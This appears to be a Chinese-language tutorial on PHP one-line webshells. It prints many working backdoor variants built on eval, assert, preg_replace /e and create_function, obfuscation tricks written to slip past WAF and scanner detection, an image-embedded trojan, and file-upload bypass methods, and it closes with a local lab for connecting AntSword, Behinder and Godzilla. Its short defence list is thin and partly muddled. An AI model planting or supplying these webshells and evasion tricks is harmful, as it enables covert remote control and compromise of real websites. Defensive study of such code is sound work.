一、一句话木马原理
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数种变形和流量加密方式,但本质是不变的:木马的函数执行了我们发送的命令,并将命令的执行结果返回。
一般WEB页面通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收客户端传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。
所以经典的一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分。
1.一句话木马实例
下面以PHP为例:
例如:
<?php eval(@$_POST['pass']); ?> |
其中eval就是执行命令的函数,$_POST['pass']就是接收的数据。eval函数把接收的数据当作PHP代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。这便是一句话木马的强大之处。
assert函数
<?php assert(@$_POST['a']); ?>
create_function函数
<?php
$fun = create_function('',$_POST['a']);
$fun();
?>
把用户传递的数据生成一个函数fun(),然后再执行fun()
call_user_func回调函数
<?php
@call_user_func(assert,$_POST['a']);
?>
call_user_func这个函数可以调用其它函数,被调用的函数是call_user_func的第一个函数,被调用的函数的参数是call_user_func的第二个参数。这样的一个语句也可以完成一句话木马。一些被waf拦截的木马可以配合这个函数绕过waf。
preg_replace函数
<?php
@preg_replace("/abcde/e", $_POST['a'], "abcdefg");
?>
这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令。这个函数的第一个参数是正则表达式,按照PHP的格式,表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”,那么这个函数的第二个参数就会被当作代码执行。
file_put_contents函数
利用函数生成木马
<?php
$test='<?php $a=$_POST["cmd"];assert($a); ?>';
file_put_contents("Trojan.php", $test);
?>
函数功能:生成一个文件,第一个参数是文件名,第二个参数是文件的内容。
2.一句话木马绕过WAF的方法:
waf是网站的防火墙,例如安全狗就是waf的一种。waf通常以关键字判断是否为一句话木马,但是一句话木马的变形有很多种,waf根本不可能全部拦截。想要绕过waf,需要掌握各种PHP小技巧,掌握的技巧多了,把技巧结合起来,设计出属于自己的一句话木马。
PHP变量函数
<?php
$a = "eval";
$a(@$_POST['a']);
?>
第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。
PHP可变变量
<?php
$bb="eval";
$aa="bb";
$$aa($_POST['a']);
?>
看这句就能理解上述语句:$$aa = $($aa) = $ (‘bb’) = $bb = "eval"
str_replace函数
<?php
$a=str_replace("Waldo", "", "eWaldoval");
$a(@$_POST['a']);
?>
函数功能:在第三个参数中,查找第一个参数,并替换成第二个参数。这里第二个参数为空字符串,就相当于删除"Waldo"。
base64_decode函数
<?php
$a=base64_decode("ZXZhbA==")
$a($_POST['a']);
?>
这里是base64解密函数,"ZXZhbA=="是eval的base64加密。
"."操作符
<?php
$a="e"."v";
$b="a"."l";
$c=$a.$b;
$c($_POST['a']);
?>
parse_str函数
<?php
$str="a=eval";
parse_str($str);
$a($_POST['a']);
?>
执行这个函数后,生成一个变量$a,值为字符串"eval"
上述六种技巧每一种单独使用都不能绕过waf,但是与 第三大点提到的函数混合起来使用,就可以顺利的欺骗waf。
tips:使用一句话木马的时候可以在函数前加”@”符,这个符号让php语句不显示错误信息,增加隐蔽性。
Function函数绕过
<?php
function fun()
{return $_POST['a'];}
@preg_replace("/test/e",fun(),"test test test");
?>
这里又有一个技巧,创建函数 fun(),返回post中“a”的数据。我的这个例子很明显是一句话木马,但是安全狗却扫不出,D盾也是如此。
注意:
eval是因为是一个语言构造器而不是一个函数,从php5之后,不能被可变函数调用。
二、一句话木马使用实例
1.下载php的windows版本,或者xampp-5.5.38
- Windows 版本的PHP下载地址(PHP7.4 或者PHP8.0):
PHP For Windows: Binaries and sources Releases
然后解压缩到C:\PHP
- 可以选择php7.4或者php8.0版本下载
2.启动PHP的WEB服务器,使用xampp或者php自带的web服务器
单独启动PHP自带WEB服务器命令: 命令行CMD.EXE下面转到php所在文件夹: 假定WEB页面的根目录在D:\www 则运行下面命令: php.exe -S 127.0.0.1:8081 -t D:/www |
3.在WEB页面的根目录(D:/www)下面放置一句话木马,图片木马等
一句话木马 ant.php:
<?php eval($_REQUEST['ant']); ?> |
用蚁剑连接。
使用冰蝎自带的shell.php放到web根目录,用冰蝎连接。
使用哥斯拉生成webshell, 例如 god.php,用哥斯拉连接。
图片木马:
自选图片或者ff0.jpg原始图片,在文件最后添加一句话木马,并生成新图片文件: ff2.jpg;
使用php的文件包含将图片包括到下面的php文件:
muma.php
<?php include ("ff2.jpg"); ?> |
蚁剑连接木马文件: http://127.0.0.1:8081/muma.php;
浏览器访问图片正常: http://127.0.0.1:8081/ff2.jpg
4.分别用AntSword/Behinder/Godzilla连接,并测试文件管理和虚拟终端功能。
三、总结
1.一句话木马的原理
将一句话木马插入到asp文件中(包括asa.cdx.cer文件),该语句将会作为触发,接收入侵者通过客户端提交的数据,执行并完成相应的入侵操作。 客户端则用来向服务端提交控制数据,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件。
2.通常WebShell客户端怎么绕过WAF
1).绕过前台脚本检测扩展名上传Webshell
当用户在客户端上传文件的时候,客户端与服务器没有进行任何的信息交互,判断上传文件的类型是前台脚本文件来判断。
白名单方式检测:允许jpg,png等文件上传,如果要上传php格式文件,可以后面加一个.jpg后缀,提交后用burp进行抓包拦截,把jpg后缀删除。
2).利用00截断上传Webshell:利用PHP函数
- include和require一般在网站内部读取文件
- file_get_contents一般用于打开一个url或一个文件
- file_exists判断文件是否存在
- 所有url中参数可以用%00控制
- 截断–本地文件包含
- WEB木马的防御方法有哪些
- 验证并转义用户输入;
- l base64编码;
- l 绑定变量,使用预编语言;
- l 控制用户的权限,以及做好数据库本身的安全工作